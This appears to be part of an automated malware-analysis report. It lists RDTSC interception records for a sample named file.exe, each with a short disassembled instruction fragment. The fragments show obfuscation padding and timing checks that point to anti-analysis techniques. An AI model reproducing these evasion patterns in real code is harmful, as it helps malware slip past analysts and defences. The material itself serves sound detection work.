Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77848C second address: 7784B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F00h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60A4E98EFAh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7784B2 second address: 7784C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778655 second address: 77867D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F60A4E98EF6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F60A4E98F09h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 778F5B second address: 778F61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7797C3 second address: 779801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F05h 0x00000007 jno 00007F60A4E98F11h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779801 second address: 779807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779807 second address: 779813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 779813 second address: 77982D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BE0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77982D second address: 779833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D613 second address: 77D617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77D617 second address: 77D62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98EFDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DAB5 second address: 77DAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F60A4BE8BE6h 0x0000000b jc 00007F60A4BE8BD6h 0x00000011 jmp 00007F60A4BE8BE1h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DAE9 second address: 77DB08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F07h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DB08 second address: 77DB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DC4E second address: 77DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F07h 0x00000009 pop esi 0x0000000a jnp 00007F60A4E98EFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DC72 second address: 77DC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77DC7A second address: 77DC92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 77E0BA second address: 77E0CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jo 00007F60A4BE8BD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AF3F second address: 78AF5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F60A4E98EFFh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AF5B second address: 78AF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78AF68 second address: 78AF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B3A5 second address: 78B3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4BE8BDAh 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F60A4BE8BD6h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B645 second address: 78B664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60A4E98F07h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B934 second address: 78B93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78B93F second address: 78B95B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F06h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC16 second address: 78BC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78BC1A second address: 78BC35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C47F second address: 78C4A6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F60A4BE8BE8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C4A6 second address: 78C4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C4AC second address: 78C4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F60A4BE8BDEh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnp 00007F60A4BE8BD6h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnl 00007F60A4BE8BD6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBA7 second address: 78CBAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBAB second address: 78CBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBB4 second address: 78CBD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F60A4E98EFCh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBD5 second address: 78CBE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60A4BE8BD6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78CBE2 second address: 78CBEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7924C9 second address: 7924DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7924DF second address: 7924E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79268C second address: 792691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79280C second address: 79283E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007F60A4E98EF6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F60A4E98F0Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F60A4E98EF6h 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A783F second address: 7A7845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7A7845 second address: 7A7887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60A4E98EFEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push ecx 0x00000017 jmp 00007F60A4E98EFBh 0x0000001c jmp 00007F60A4E98F02h 0x00000021 pop ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE6F5 second address: 7BE701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE840 second address: 7BE845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE845 second address: 7BE850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BE850 second address: 7BE854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEC63 second address: 7BEC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BEF26 second address: 7BEF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007F60A4E98F27h 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F60A4E98EF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C1521 second address: 7C1527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C4D29 second address: 7C4D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F01h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FCF second address: 7E2FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FD3 second address: 7E2FD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FD7 second address: 7E2FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7E2FE3 second address: 7E2FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 800121 second address: 800127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF3CB second address: 7FF3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF3E5 second address: 7FF3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F60A4BE8BE1h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF3FF second address: 7FF415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F60A4E98EFEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF696 second address: 7FF6B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F60A4BE8BE3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FF6B3 second address: 7FF6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFA70 second address: 7FFA9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDDh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F60A4BE8BE5h 0x00000011 jmp 00007F60A4BE8BDDh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFA9C second address: 7FFAA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7FFAA2 second address: 7FFAA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802DAC second address: 802DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F60A4E98EF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802DB7 second address: 802E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F60A4BE8BE4h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F60A4BE8BD8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 add edx, dword ptr [ebp+122D23D5h] 0x0000002e push 00000004h 0x00000030 movsx edx, bx 0x00000033 call 00007F60A4BE8BD9h 0x00000038 jnp 00007F60A4BE8BE4h 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 802E14 second address: 802E18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718C1D second address: 718C27 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F60A4BE8BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 718C27 second address: 718C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60A4E98F06h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49902AD second address: 49902BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49902BC second address: 49902E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F60A4E98F05h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49902E2 second address: 499030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F60A4BE8BDDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 499030B second address: 4990356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov bh, 72h 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F60A4E98F02h 0x00000016 xor esi, 210E61D8h 0x0000001c jmp 00007F60A4E98EFBh 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990356 second address: 499035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0016 second address: 49C0055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60A4E98F06h 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F60A4E98EFBh 0x00000010 xchg eax, ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F60A4E98F05h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0055 second address: 49C009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F60A4BE8BDCh 0x00000012 and al, FFFFFF88h 0x00000015 jmp 00007F60A4BE8BDBh 0x0000001a popfd 0x0000001b push ecx 0x0000001c mov esi, ebx 0x0000001e pop edx 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F60A4BE8BDDh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C009E second address: 49C00BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4E98F01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00BA second address: 49C00D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00D4 second address: 49C00DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00DA second address: 49C00DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00DE second address: 49C00EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C00EC second address: 49C0111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F60A4BE8BE0h 0x0000000a adc ch, FFFFFFD8h 0x0000000d jmp 00007F60A4BE8BDBh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0111 second address: 49C017B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F60A4E98EFFh 0x00000009 adc ax, 709Eh 0x0000000e jmp 00007F60A4E98F09h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F60A4E98F06h 0x0000001f push ecx 0x00000020 pop edx 0x00000021 popad 0x00000022 mov ax, 939Dh 0x00000026 popad 0x00000027 mov dword ptr [esp], esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F60A4E98EFFh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C017B second address: 49C0181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0181 second address: 49C01F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007F60A4E98F07h 0x00000010 nop 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 movzx eax, dx 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d pop ebx 0x0000001e call 00007F60A4E98EFEh 0x00000023 pop esi 0x00000024 popad 0x00000025 popad 0x00000026 nop 0x00000027 pushad 0x00000028 mov si, di 0x0000002b mov di, 0B7Eh 0x0000002f popad 0x00000030 push dword ptr [ebp+08h] 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F60A4E98EFEh 0x0000003c sub cl, 00000048h 0x0000003f jmp 00007F60A4E98EFBh 0x00000044 popfd 0x00000045 mov cx, D2BFh 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0253 second address: 49C027B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C027B second address: 49C0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C0280 second address: 49C02B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60A4BE8BE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F60A4BE8BE0h 0x00000010 je 00007F60A4BE8C3Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov si, bx 0x0000001c mov eax, edx 0x0000001e popad 0x0000001f rdtsc
